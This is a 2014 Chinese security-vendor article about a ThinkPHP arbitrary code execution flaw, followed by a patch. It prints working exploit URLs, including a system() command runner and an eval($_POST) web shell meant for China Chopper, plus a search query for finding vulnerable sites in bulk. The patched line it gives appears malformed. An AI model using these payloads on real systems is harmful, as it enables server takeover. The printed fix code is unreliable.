English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 威盾新闻 >> ThinkPHP框架任意代码执行漏洞的利用及其修复方法

 

ThinkPHP框架任意代码执行漏洞的利用及其修复方法

威盾防火墙 2014-12-05

 
这篇文章主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下

ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式, 封装了CURD和一些常用操作,单一入口模式等,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现.
 
然而近期thinkphp框架爆出了一个任意代码执行漏洞,其危害性相当的高,漏洞利用方法如下:
 

1
2
3
index.php/module/aciton/param1/${@print(THINK_VERSION)}
  
index.php/module/aciton/param1/${@function_all()}

其中的function_all代表任何函数,比如:

1
index.php/module/aciton/param1/${@phpinfo()}

就可以获取服务器的系统配置信息等。

1
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

可以列出网站文件列表

1
index.php/module/action/param1/{${eval($_POST[s])}}

就可以直接执行一句话代码,用菜刀直接连接.

这样黑客们就可以直接通过google批量搜索关键字:thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。
 
thinkphp框架执行任意代码漏洞修复方法:
 
用户可下载官方发布的补丁:
 
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
 
或者或者直接修改源码:

将/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的

1
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

修改为:

1
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));

将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。


相关内容: 最新内容:
PHP编程中的常见漏洞和代码实例[2014-12-05]
PHP代码网站如何防范SQL注入漏洞攻击建议分享[2014-12-05]
Microsoft SQL Server扩展存储过程权限提升漏洞[2014-12-04]
黑客是如何利用Windows2003+IIS6.0的文件名解析漏洞入侵网站挂马的?[2014-12-04]
Web开发常见的几个漏洞解决方法[2014-12-04]
学会检查SQL注入式攻击漏洞[2014-12-01]
PHP编程中的常见漏洞和代码实例[2014-12-05]
PHP代码网站如何防范SQL注入漏洞攻击建议分享[2014-12-05]
ASP SQL防注入的方法[2014-12-04]
轻松三步走!防止SQL数据库注入攻击[2014-12-04]
.net防sql注入代码[2014-12-04]
编写通用的ASP防SQL注入攻击程序[2014-12-04]